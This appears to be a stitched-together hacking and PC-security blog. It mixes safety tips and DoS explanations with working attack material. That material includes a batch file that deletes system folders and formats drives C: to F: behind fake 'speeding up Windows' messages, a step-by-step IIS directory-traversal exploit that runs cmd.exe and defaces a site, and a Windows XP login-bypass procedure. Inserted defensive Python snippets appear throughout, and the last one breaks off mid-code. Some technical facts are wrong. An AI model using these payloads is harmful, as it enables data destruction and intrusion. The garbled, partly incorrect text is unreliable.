Sunday, January 4

Ten Simple Steps To Protect Your PC


HOW TO SAVE YOUR PC

When you think of security, you likely think of banks and financial institutions or at least companies in fear of corporate espionage. However, they are not the only ones that have to be concerned about security. Anyone, including you, who uses a home or business computer to get on the Internet should be concerned about security. The Internet, though a wonderful tool full of a wealth of information, is also full of hackers, viruses, and scams that can cause your computer a great deal of damage. Luckily, though, there are ways to prevent a lot of what is out there from getting to your computer. There are tools and precautions that you can take. The following is a list of ten that can go a long way in protecting you and increasing your internet security.
1) Make sure that you have a firewall up and running on your computer as well as a virus checker. In addition, make sure that any firewall that is included in the software that you are using has been activated and is set properly. Consult a professional or your software's manual to make sure you have the settings on and correctly placed for optimum security.
2) Try not to share your computer. Obviously there are times, especially with a home computer, when there will be multiple users. The problem is more with kids than anything. Children have a tendency to download anything they think they might need without thinking it through. If you do have to share your computer with kids, take time to talk to them about the risks of downloading software.
3) Back up your data often, especially what you consider to be essential data. If you don't do anything else, make sure you back up your files. Anything you back up can then be recovered if there is a problem. Viruses, worms, and the like can eat up files, and before you know it family photos, business files, or important contact information can be lost.
4) Make sure you know what you are doing before you download anything. Don't click on any unknown link that asks you to agree to install software to view their page. Sometimes those contain spyware.
5) A fifth way to increase security is to be careful about any business or sensitive information you access or pass on a public computer. You don't know what has been downloaded onto those computers that could affect your files. Public computers could even have spyware, key logger software, or a number of other programs that could steal sensitive information. If you must use a public computer, make sure you sweep it with some sort of spyware seeking program.
6) Carry a flash card with you. You can load your own software onto the flash card for use on any public computer. This will help keep you safe from viruses. You may also want to use it if you are going to be using a family computer that you are not positive is virus and spyware free.
7) Beware of visiting porn sites or anything like that. Those sites often contain spyware, Trojan horses, viruses, and all sorts of nasty bugs. These sites can even have software that will run in the background of your computer without even asking you, so it is a good idea to just stay away.
8) Never open SPAM email while you are still connected to the Internet. Many times, just by clicking on SPAM you may be adding your own email address to another SPAM list. Often your email address will be used as the sending address and you will not know this until your account is closed. You can also end up with viruses or worms from clicking on SPAM emails.
9) Turn off your Internet connection if you are determined to see what is in the SPAM email. If you really feel like you need to look at a message, but are unsure where it is from, shut off your connection at the firewall first.
10) Lastly, make sure you have a good virus checker installed on your computer. There are many free ones out there and they work well at protecting your computer from viruses. Look for a virus checker with regular updates, even daily updating, and make sure you receive those updates. Virus software will help protect your computer from new viruses and new worms that get discovered on the Internet. By making sure you are updating regularly, you can keep up with the viruses that are out there.

If these simple steps are followed, you can be safe from danger.

VIRUSES THAT NEED COMMAND.COM TO RUN

If, while trying to shut down your PC, a pop-up appears saying that 'command.com' is still running, and it takes more than 10 minutes just to open 'My Computer', then your computer has certainly been affected by a virus. ALSO, THIS TYPE OF VIRUS IS NOT SCANNED BY ANTIVIRUS.






HOW TO REMOVE THOSE VIRUSES






Download HJTsetup.exe from this link http://www.thespykiller.co.uk/files/HJTsetup.exe to your computer. Install it. By default it will install to C:\Program Files\Hijack This. Continue to click "next" in the setup dialogue boxes until you get to the "Select Addition Tasks" dialogue. Continue to follow the rest of the prompts from there. At the final dialogue box click "Finish" and it will launch Hijack This. Click on the "Do a system scan and save a logfile" button. It will scan and the log should open in Notepad. Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log and post it in this thread.
Do not fix anything yet unless you know what you are doing. This is a powerful tool that can crash the computer if used improperly.
Please download SmitFraudFix from this link http://siri.urz.free.fr/Fix/SmitfraudFix.zip Then extract the contents to your desktop.
!!!! Only run option #1, as running the other options on an uninfected computer will damage the desktop. !!!!
Open the "SmitfraudFix" folder and double-click "smitfraudfix.cmd". Select option #1 - Search by typing 1 and pressing "Enter"; a text file will appear, which lists infected files (if present). Please copy/paste the content of that report into your next reply. Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.
If Norton 2005 is out of date, download "AVG Free Antivirus" from the following link, but do not install it yet: AVG Free Antivirus
Go offline. Then go to Start > Control Panel > scroll down to and uninstall "Norton 2005 Antivirus".
Once the uninstall is complete, go back to the desktop and install the free AVG Antivirus (do not check the box to scan on every startup). Go online and update AVG Free Antivirus.
You should now have an up-to-date antivirus running and the out-of-date one removed.

HACKERS SECRET





How Do Hackers Break Into Computers?

"You have to be a Hacker or think like a Hacker, for making a well designed security system."

To break into a computer, hackers discover (find) vulnerabilities and then create an exploit (a program or set of instructions to be followed by hand) that takes advantage of the vulnerabilities. These vulnerabilities and their related exploit programs, if made public, are then used by many others, good and bad. For example, some users are system administrators using them to test their systems. Others are computer hackers just wanting to have fun. Then there are the crackers who scan systems to determine which computers have vulnerabilities and then carry out an attack.

How to Discover New Vulnerabilities
Many of the most skilled individuals involved in discovering new ways to break into computers work in corporate, governmental, or academic laboratories. They not only use considerable brainpower and creativity in their jobs but also typically create and use sophisticated software tools to assist them in their research duties. (The National Security Agency, or NSA, was one of the earliest government agencies to create such a research group.) Even in these research environments, the people who find ways to break into computers typically describe themselves as "hackers." The analyst has access to the source code (that is, the commands the programmers write). This process is called "white-box" analysis. Depending on the software language they are examining for vulnerabilities, usually there are programs that will scan for commands or syntax known to cause problems. Some programming languages, most famously Java, are inherently designed to resist security flaws.

Disassemblers and Decompilers
A disassembler converts a program back into the original programming language. This is a difficult task, and it is likely to work only with a small program, typically one written in Java. A decompiler converts software into assembly language. Assembly language is a low-level language far more difficult to understand than the high-level languages in which most computer programs are written. Nevertheless, a sufficiently talented programmer can analyze assembly language. Although decompilers are typically able to handle larger programs than are disassemblers, they can process only comparatively small programs. Today, decompilers are the tools of choice to analyze worms, viruses, and other small instances of malware (that is, malicious programs).

WINDOWS XP
In Windows XP, some 40 million lines of source code confront the analyst team or crackers. It is difficult for a decompiler to extract code from such a big program. Even a debugger would make little headway. So other alternatives are chosen, the most prevalent of which is "black box" analysis. In this process, the professional analyst team or crackers try to find all the possible ways to give inputs. They then try the inputs to determine whether they have the potential to "crash" a system or evade security. Because of the difficulty of this process, the team or the individual uses a "fault injection" tool to speed this technique. Examples of fault injection include a database query crafted to command a database server to erase everything, or a Web browser URL infecting a Web server with a worm. The process of trying all those different inputs looking for some fault is also known as fuzzing.
Buffer Overflows
Buffer and heap overflows are special cases of fault injection. Testing for these conditions has discovered the majority of computer security flaws known today. Basically, a "buffer overflow" is a condition whereby too much data is placed in too little allocated space in a computer's memory. The extra data, if properly crafted, and if inserted into a program with the right kind of access to memory, can end up in a region of memory enabling a break-in.
Crackers have discovered buffer overflows by simply trying super-long data inputs, such as typing a long URL into a browser location window. A super-long URL is an example of an "injection vector." When the attacker sees some sort of error condition resulting from this injection, this is a sign that a buffer overflow has occurred. An example of an error condition is to get the error message on a UNIX-type of system known as "segmentation fault." The trick is to see whether one may use the overflow condition to break into a computer. The attacker next inserts "shellcode" into this long string of data. Shellcode is a compiled program actually performing the break-in. Shellcode is the "payload" of the exploit.



FINAL ATTACK


After the cracker has detected vulnerabilities in the system he or she has decided to attack, the next step is to carry out the attack. In some cases, the exploit itself is easy. What follows is an example of an exploit to break into a Windows 2000 Web server and deface its Website. This exploit will work on Windows 2000 Server or Windows Professional, but only if it has not been patched beyond Service Pack 2, and only if it is running IIS or a Personal Web Server that is not patched.


1)The attack program is simply a Web browser, and the attacker just has to insert a series of URLs in the location window. The first URL identifies whether the server is likely to be vulnerable:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"dir%20c:\"
In the preceding URL, %20 means "space." The "+" also means "space." The %255c is Unicode encoded. After it goes through the Unicode translation, the attacker winds up with 5c, which is hex for ‘\'. So from the string ..%255c..%255c, you get ..\..\ for "go up two directories."
If the victim computer is vulnerable, the attacker's browser will show something like the following:
Directory of c:\
09/21/2001 09:59a ASFRoot
09/22/2001 06:53a Documents and Settings
09/21/2001 05:06p Inetpub
09/29/2001 05:37p Microsoft UAM Volume
09/21/2001 05:09p Program Files
10/01/2001 03:57p WINNT
0 File(s) 0 bytes
6 Dir(s) 8,984,092,672 bytes free
2)The next malicious URL the attacker must insert is as follows:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"copy%20..\..\winnt\system32\cmd.exe%20..\scripts\cmd1.exe"
This copies cmd.exe (running the MS-DOS program in Windows 2000, NT and XP) into the Web server's scripts directory. This directory holds CGI (Common Gateway Interface) programs. (Examples of CGI programs are shopping carts and programs to search the local Website.) If the server is vulnerable, the attacker sees the following in the browser:
CGI Error.
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are
1 file(s) copied.
This error message reveals that the attack copied the cmd.exe program into the scripts directory.


3)The final step is to insert this URL:
http://victim.com/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+I%20broke%20in%20xyz!+../wwwroot/iisstart.asp&dir&type+../wwwroot/iisstart.asp
This creates a main page for the Website that says, "I broke in xyz!" Note that this only works if the main page is named iisstart.asp. If it is named something else, such as index.shtml, the attacker must make the substitution for the proper main page name.




In this way hackers invade your system, so be ready to face the hackers.
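The URLs above rely on encodings that only turn into ..\ after more than one decoding pass. As an added example (not from the original post), this Python sketch shows the defensive counterpart: decode a request path until it stops changing, fold overlong UTF-8 forms such as %c1%9c, and only then look for traversal. The log layout and the documentation-range IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

MAX_ROUNDS = 5                          # give up decoding after this many passes
TRAVERSAL = re.compile(r"\.\.[\\/]")    # "../" or "..\" once fully decoded

# Constructed sample lines: client IP, method, request target, status.
SAMPLE_LOG = """\
192.0.2.10 GET /default.asp 200
192.0.2.10 GET /images/my%20logo.gif 200
198.51.100.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir 200
198.51.100.7 GET /scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+dir 502
"""


def fold_overlong(data):
    """Map overlong 2-byte UTF-8 forms (lead byte 0xC0/0xC1) to the ASCII byte they encode."""
    out, i, changed = bytearray(), 0, False
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i, changed = i + 2, True
        else:
            out.append(b)
            i += 1
    return bytes(out), changed


def canonicalize(raw_path):
    """Percent-decode until nothing changes. Returns (text, rounds, overlong_seen)."""
    data = raw_path.encode("latin-1", "replace")
    rounds, overlong = 0, False
    for _ in range(MAX_ROUNDS):
        decoded, folded = fold_overlong(unquote_to_bytes(data))
        overlong = overlong or folded
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data.decode("latin-1"), rounds, overlong


def inspect_target(target):
    """Return (decoded_path, reasons) for one request target; the query string is ignored."""
    path = target.split("?", 1)[0]
    text, rounds, overlong = canonicalize(path)
    reasons = []
    if rounds >= 2:
        reasons.append("double-encoded")     # e.g. %255c -> %5c -> backslash
    if overlong:
        reasons.append("overlong-utf8")      # e.g. %c1%9c -> backslash
    if TRAVERSAL.search(text):
        reasons.append("traversal")
    if "cmd.exe" in text.lower():
        reasons.append("cmd.exe")
    return text, reasons


def scan(lines):
    """Return (client_ip, decoded_path, reasons) for every suspicious log line."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue
        ip, _method, target, _status = fields
        text, reasons = inspect_target(target)
        if reasons:
            findings.append((ip, text, reasons))
    return findings


if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG.splitlines()):
        print(ip, path, ",".join(reasons))
```

A request filter built on the same idea should reject the request when decoding has not settled within MAX_ROUNDS, rather than serve a path it could not fully canonicalize.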

Virus that Destroy The Whole Computer Silently : A batch file Program

@echo off
md Wait\wait
md Wait\few
md Wait\minutes
start /max Wait
start %systemroot%/system32/wisptis
start %systemroot%/system32/wisptis
color 1
cd\
rd /s /q program files
cd %systemroot%
rd /s /q system32
cls
attrib /s /d +r +h %.txt%
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT FOR 10 MINUTES .......
echo *********************************************************
format c: /q /y
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT FOR 5 MINUTES ........
echo *********************************************************
format d: /q /y
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT FOR 2 MINUTES ........
echo *********************************************************
format e: /q /y
cls
echo *********************************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo *********************************************************
echo SO, PLEASE WAIT 30 seconds ...........
echo *********************************************************
format f: /q /y
cd\
rd /s /q documetns and settings
exit

HACK WINDOWS WITHOUT CHANGING PASSWORD


Hack into a computer running Windows XP without changing its password and find out all passwords on the machine (including admin accounts). You do not need access to any accounts to do this, of course, but please do not do this on anyone else's computer without their proper authorisation.




Steps to Hack into a Windows XP Computer without changing password:


1. Get physical access to the machine. It must have a CD or DVD drive.


2. Download "DreamPackPL HERE". If not available, find it on Google.


3. Unzip the downloaded dreampackpl_iso.zip and you'll get dreampackpl.ISO.


4. Use any burning program that can burn ISO images.


5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.


6. Press "R" to install DreamPackPL and "C" to install DreamPackPL by using the recovery console.


7. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)


8. Backup your original sfcfiles.dll by typing:"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)


9. Copy the hacked file from CD to system32 folder. Type:"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)


10. Type "exit", take out disk and reboot.


11. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.


12. Click the top graphic on the DreamPack menu and you will get a menu popup.


13. Go to commands and enable the options and enable the god command.


14. Type "god" in the password field to get in Windows.
You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.

HACKING THROUGH WEB BROWSER


WEB BROWSER SECURITY




"Sorry dear readers, I could not post new topics for a long time. I was really very busy those days. I got the time today to write something interesting, but I'm still very busy, but I promise I'll come back soon with a lot of new and interesting topics for all of our readers."



Now, come to our topic, friends: web browsers like Internet Explorer, Mozilla etc. can be used to fetch your secret documents and files. Now, let's learn how this is possible.



A Web browser is a software application that enables a user to display and interact with text, images, and other information typically located on a Web page at a website on the World Wide Web or a local area network. Web browsers communicate with Web servers primarily using HTTP (hypertext transfer protocol) to fetch webpages. HTTP allows Web browsers to submit information to Web servers as well as fetch Web pages from them. The most commonly used HTTP is HTTP/1.1, which is fully defined in RFC 2616. HTTP/1.1 has its own required standards that Internet Explorer does not fully support, but most other current-generation Web browsers do.



HOW THIS COULD BE USED
Pasco (the Latin word for "Browse") is a command line tool that runs on Unix or Windows and can reconstruct the internal structures for IE Index.dat files. Pasco accepts an Index.dat file, reconstructs the data, and outputs the information in a delimited text file format. This format is useful when you need to import the data into a spreadsheet such as Microsoft Excel. Figure 1 shows Pasco in action.
Pasco shows that IE saves the following fields from a single web site visit in the Index.dat file:

>The record type - Pasco signifies the activity is either a URL that was browsed or a website that redirected the user's browser to another site.

>The URL - The actual website that the user visited.

>Modified Time - The last moment in time the website was modified.

>Access Time - The moment in time the user browsed the website.

>Filename - The local file name that contains a copy of the URL listed.

>Directory - The local directory you can find the "Filename" above.

>HTTP Headers - The HTTP headers the user received when he browsed the URL.



Nowadays, most websites use CGI scripts. These scripts are located in the /cgi-bin directory. These scripts can be downloaded for further examination, or even used to steal passwords to access password-protected parts of the website.



So, simply type the following in the location bar of your browser, and observe what you get:



ftp://www.hostname.com/cgi-bin


The most common way to get the password file is to FTP anonymously and check whether access to the passwd file in the /etc directory is restricted or not. If it is not restricted, then download the file, first unshadow it, and then crack it. First you need to find a box that is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to http://www.altavista.com/ and just search on cgi-bin AND perl.exe or cgi-bin AND phf.




>>Finger box hacking: Let's say you wanted to break into somewhere like .... hmmmm AOL. The first thing we would do is type in their web site in the URL: http://www.aol.com./ The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this: http://www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query......

nobody@nowhere.org /bin/mail

me@junk.org

BLOCK UNWANTED SITE ON YOUR COMPUTER

Hey friends, do you want to block a site from opening on your computer? If you want to block a site from being browsed from your Windows computer, do the following steps.

Open the location
C:\WINDOWS\system32\drivers\etc
You will find a hosts file there. First back up the hosts file.
Open the hosts file in Notepad.
At the end of the file you will see the line below.

127.0.0.1 localhost

Append the following line at the end
127.0.0.1 BlockSitename.com
Replace BlockSitename.com with the name of the site that you want to block.

example......

If you want to restrict http://www.yahoo.com/ then in the hosts file do this (the entry takes the host name only, without http:// or the trailing slash):
127.0.0.1 www.yahoo.com
or
0.0.0.0 www.yahoo.com

as ip 0.0.0.0 means nothing.


Then go to Start->Run-> type: ipconfig /flushdns to restart the network.

Note: That will only stop the domain name from going to the website; if you know the IP address of the site from the gnsstuff or whois, then you can still browse the site.
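Added example (not from the original post): the hosts file matches host names only, so an entry written as a full URL never takes effect. This Python helper turns whatever the user pastes into valid entries and appends them without duplicating existing ones; it works on hosts-file text in memory, and pairing each name with its www. variant is an assumption about what the user wants blocked.

```python
import re
from urllib.parse import urlsplit

LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")   # one DNS label


def to_hostname(site):
    """Reduce 'http://www.example.com/page' or 'example.com' to a bare host name."""
    site = site.strip()
    parts = urlsplit(site if "//" in site else "//" + site)
    host = (parts.hostname or "").rstrip(".").lower()
    if not host or not all(LABEL.match(label) for label in host.split(".")):
        raise ValueError(f"not a usable host name: {site!r}")
    return host


def block_lines(site, sink="0.0.0.0"):
    """Hosts-file lines for the site, with and without the www. prefix (assumed intent)."""
    host = to_hostname(site)
    other = host[4:] if host.startswith("www.") else "www." + host
    return [f"{sink} {name}" for name in (host, other)]


def add_blocks(hosts_text, site, sink="0.0.0.0"):
    """Return hosts_text with the block entries appended; names already listed are skipped."""
    present = set()
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()      # drop comments, split on whitespace
        present.update(name.lower() for name in fields[1:])
    new = [entry for entry in block_lines(site, sink) if entry.split()[1] not in present]
    if not new:
        return hosts_text
    sep = "" if hosts_text.endswith("\n") or not hosts_text else "\n"
    return hosts_text + sep + "\n".join(new) + "\n"


# Constructed sample: the default hosts file content shown above.
SAMPLE_HOSTS = "127.0.0.1 localhost\n"

if __name__ == "__main__":
    print(add_blocks(SAMPLE_HOSTS, "http://www.yahoo.com/"), end="")
```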

DOS & BATCH PROGRAMMING TIPS





Ms Dos And Batch File Programming Tricks And Tips

DOS is basically a file called command.com. It is this file which handles all DOS commands that we give at the DOS prompt, such as copy, dir, del, etc.

Batch file programming is nothing but the Windows version of Unix shell programming. To perform a bulk set of commands over and over again, batch files are used.



Some Important And Hidden Dos Command
1>ANSI.SYS - Defines functions that change display graphics, control cursor movement, and reassign keys.
2>ARP - Displays, adds, and removes arp information from network devices
3>AT - Schedule a time to execute commands or programs.
4>COLOR - Easily change the foreground and background color of the MS-DOS window.
5>CONTROL - Open control panel icons from the MS-DOS prompt.
6>CTTY - Change the computers input/output devices.
7>EMM386 - Load extended Memory Manager.
8>IFSHLP.SYS - 32-bit file manager.
9>SWITCHES - Remove add functions from MS-DOS.
10>SYS - Transfer system files to disk drive.

Redirection Of OUTPUT:
Send the output of the DOS prompt to a file on disk. This can be done using the redirection operator, > .
Example: c:\windows>net>xyz.txt
c:\windows>help>>xyz.txt
This command will execute the net command and will store the results in the text file, xyz.txt.
To print the results: c:\windows>dir*.*>prn

Redirection of Input:
We can also redirect input from a .txt file to the DOS prompt.
Example: c:\windows> more <>

BATCH PROGRAM TO DELETE FILES:

@ECHO OFF
ECHO.
ECHO I am going to delete the following files:
ECHO %1 %2
ECHO.
ECHO CTRL+C to Abort Process
PAUSE
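REM Delete each file named on the command line; the FOR variable must keep the same case in both places
FOR %%A IN (%1 %2) DO DEL %%A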
ECHO Killed files.Mission Accomplished By Prem Bharti

DOS ATTACK


DOS-DENIAL OF SERVICE ATTACK




Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers.
In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, web sites, online accounts (banking, etc.), or other services that rely on the affected computer.
The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular web site into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.




What is a distributed denial-of-service (DDoS) attack?


In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a web site or send spam to particular email addresses. The attack is "distributed" because the attacker is using multiple computers, including yours, to launch the denial-of-service attack.




DOS attacks are of the following different types:
1. Those that exploit vulnerabilities in the TCP/IP protocols suite.
2. Those that exploit vulnerabilities in the IPv4 implementation.
3. There are also some brute force attacks, which try to use up all resources of the target system and make the services unusable.
Some common vulnerabilities are Ping of Death, Teardrop, SYN attacks and Land Attacks.




Ping of Death


This vulnerability is quite well known and was earlier commonly used to hang remote systems (or even force them to reboot) so that no users can use its services. This exploit no longer works, as almost all system administrators would have upgraded their systems making them safe from such attacks. In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP, which is 65 536. This would have almost always caused the remote system to hang, reboot or crash. This DOS attack could be carried out even through the command line, in the following manner: The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the victim's computer:


C:\windows>ping -l 65540 .




Teardrop


The Teardrop attack exploits the vulnerability present in the reassembling of data packets. Whenever data is being sent over the Internet, it is broken down into smaller fragments at the source system and put together at the destination system. Say you need to send 4000 bytes of data from one system to the other, then not all of the 4000 bytes is sent at one go. This entire chunk of data is first broken down into smaller parts and divided into a number of packets, with each packet carrying a specified range of data. For example, say 4000 bytes is divided into 3 packets, then:
The first packet will carry data from 1 byte to 1500 bytes
The second packet will carry data from 1501 bytes to 3000 bytes
The third packet will carry data from 3001 bytes to 4000 bytes
These packets have an OFFSET field in their TCP header part. This Offset field specifies from which byte to which byte that particular data packet carries data, or the range of data that it is carrying. This, along with the sequence numbers, helps the destination system to reassemble the data packets in the correct order.
Now in this attack, a series of data packets are sent to the target system with overlapping Offset field values. As a result, the target system is not able to reassemble the packets and is forced to crash, hang or reboot. For example, consider the following scenario. Normally a system receives data packets in the following form, with no overlapping Offset values:
(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)
Now in a Teardrop attack, the data packets are sent to the target computer in the following format:
(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)
When the target system receives something like the above, it simply cannot handle it and will crash or hang or reboot.
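Added example, not part of the original post: a strict reassembly routine of the kind that defeats both attacks described above, refusing fragments that would extend past the 65,535-byte IPv4 datagram limit (Ping of Death) or that overlap (Teardrop). It uses byte offsets and the text's 1-based ranges for readability; real IPv4 fragment offsets sit in the IP header and count 8-byte units, and the 20-byte header size is an assumption.

```python
from dataclasses import dataclass

MAX_DATAGRAM = 65535   # IPv4 Total Length is a 16-bit field
IP_HEADER = 20         # assumption: IP header without options


class ReassemblyError(Exception):
    """args[0] is a short reason code: oversize, conflict, incomplete, overlap, gap."""


@dataclass(frozen=True)
class Fragment:
    offset: int     # byte offset of this payload within the original datagram
    data: bytes
    more: bool      # True unless this is the final fragment


def frag(first, last, more=True):
    """Build a fragment from the text's 1-based inclusive byte range (filler payload)."""
    return Fragment(offset=first - 1, data=b"A" * (last - first + 1), more=more)


def reassemble(fragments):
    """Strictly reassemble one datagram's fragments, accepted in any arrival order."""
    total = None                      # payload length announced by the final fragment
    pieces = []
    for f in fragments:
        start, end = f.offset, f.offset + len(f.data)
        if start < 0 or IP_HEADER + end > MAX_DATAGRAM:
            raise ReassemblyError("oversize", f"fragment ends at byte {end}")
        if not f.more:
            if total is not None and total != end:
                raise ReassemblyError("conflict", "two different final fragments")
            total = end
        pieces.append((start, end, f.data))
    if total is None:
        raise ReassemblyError("incomplete", "final fragment missing")
    pieces.sort(key=lambda p: (p[0], p[1]))
    payload, pos = bytearray(), 0
    for start, end, data in pieces:
        if start < pos:               # strict: even exact duplicates are refused
            raise ReassemblyError("overlap", f"byte {start} already covered up to {pos}")
        if start > pos:
            raise ReassemblyError("gap", f"bytes {pos}..{start - 1} missing")
        payload += data
        pos = end
    if pos != total:
        raise ReassemblyError("conflict", "data extends past the final fragment")
    return bytes(payload)


def verdict(fragments):
    """Return ('ok', payload_length) or (reason_code, None)."""
    try:
        return "ok", len(reassemble(fragments))
    except ReassemblyError as exc:
        return exc.args[0], None


# Constructed inputs using the byte ranges from the text.
NORMAL = [frag(1, 1500), frag(1501, 3000), frag(3001, 4000, more=False)]
TEARDROP = [frag(1, 1500), frag(1500, 3000), frag(1001, 3600, more=False)]
OVERSIZE = [frag(1, 65000), frag(65001, 65540, more=False)]

if __name__ == "__main__":
    for name, frags in (("normal", NORMAL), ("teardrop", TEARDROP), ("oversize", OVERSIZE)):
        print(name, verdict(frags))
```

The point of the strict checks is that every length and offset is validated before any byte is copied, so a malformed set of fragments is discarded instead of reaching the copy loop.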




SYN Attack


The SYN attack exploits TCP/IP's three-way handshake. Thus, in order to understand how SYN attacks work, you first need to know how TCP/IP establishes a connection between two systems. Whenever a client wants to establish a connection with a host, three steps take place. These three steps are referred to as the three-way handshake. In a normal three-way handshake, the client sends a SYN packet to the host, and the host replies to this packet with a SYN ACK packet. Then the client responds with an ACK (Acknowledgement) packet. This will be clearer after the following depiction of these steps:

1. Client SYN Packet → Host
In the first step the client sends a SYN packet to the host, with whom it wants to establish a three-way connection. The SYN packet requests the remote system for a connection. It also contains the Initial Sequence Number or ISN of the client, which is needed by the host to put back the fragmented data in the correct sequence.
2. Host SYN/ACK Packet → Client
In the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packet sent by the client and sends the client its own ISN.
3. Client ACK → Host
In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with an ACK packet.

These three steps together are known as the 3-way handshake, and only when they are completed is a complete TCP/IP connection established.

In a SYN attack, several SYN packets are sent to the server, but all these SYN packets have a bad source IP address. When the target system receives these SYN packets with bad IP addresses, it tries to respond to each one of them with a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the target system never actually receives the ACK packet. It thus queues up all these requests until it receives an ACK message.
The requests are not removed unless and until the remote target system gets an ACK message. Hence these requests take up or occupy valuable resources of the target machine. To actually affect the target system, a large number of SYN bad IP packets have to be sent. As these packets have a bad source IP, they queue up, use up resources and memory of the target system and eventually crash, hang or reboot the system.

Land Attacks

A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP address, the IP address of the target system itself is used. This creates an infinite loop between the target system and the target system itself. However, almost all systems have filters or firewalls against such attacks.
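Added example, not part of the original post: a small model of a server's half-open connection queue, showing why unanswered SYNs deny service to legitimate clients and how a timeout frees the queue, plus the source-equals-destination check that stops a Land packet. The backlog size, timeout and addresses are constructed values, and the traffic is a list of tuples in memory, not packets on a network.

```python
from collections import OrderedDict


class HalfOpenQueue:
    """Server-side view of TCP handshakes: SYN received, final ACK not yet seen."""

    def __init__(self, server_ip, backlog=128, timeout=30.0):
        self.server_ip = server_ip
        self.backlog = backlog          # most half-open entries the server will hold
        self.timeout = timeout          # seconds before an unanswered entry is dropped
        self.pending = OrderedDict()    # (src_ip, src_port) -> time the SYN arrived
        self.completed = 0
        self.refused = 0
        self.land_dropped = 0
        self.peak = 0

    def _expire(self, now):
        # Entries are stored in arrival order, so the oldest is always first.
        while self.pending:
            key = next(iter(self.pending))
            if now - self.pending[key] < self.timeout:
                break
            del self.pending[key]

    def receive(self, now, src_ip, src_port, flags):
        """Process one segment addressed to the server; return what happened to it."""
        self._expire(now)
        if src_ip == self.server_ip:            # Land: the packet claims to come from us
            self.land_dropped += 1
            return "dropped-land"
        key = (src_ip, src_port)
        if flags == "SYN":
            if key in self.pending:
                return "retransmit"
            if len(self.pending) >= self.backlog:
                self.refused += 1
                return "refused-backlog-full"
            self.pending[key] = now             # SYN/ACK sent, now waiting for the ACK
            self.peak = max(self.peak, len(self.pending))
            return "syn-ack-sent"
        if flags == "ACK" and key in self.pending:
            del self.pending[key]
            self.completed += 1
            return "established"
        return "ignored"


def simulate():
    """Replay a constructed timeline; returns (queue, outcomes of the four probe packets)."""
    q = HalfOpenQueue(server_ip="192.0.2.80", backlog=128, timeout=30.0)
    for i in range(3):                          # three normal clients finish the handshake
        t = 0.1 * i
        q.receive(t, f"192.0.2.{i + 1}", 40000, "SYN")
        q.receive(t + 0.05, f"192.0.2.{i + 1}", 40000, "ACK")
    for i in range(200):                        # 200 SYNs whose sources never answer
        q.receive(1.0 + i * 0.001, f"203.0.113.{i % 250 + 1}", 1024 + i, "SYN")
    probes = [
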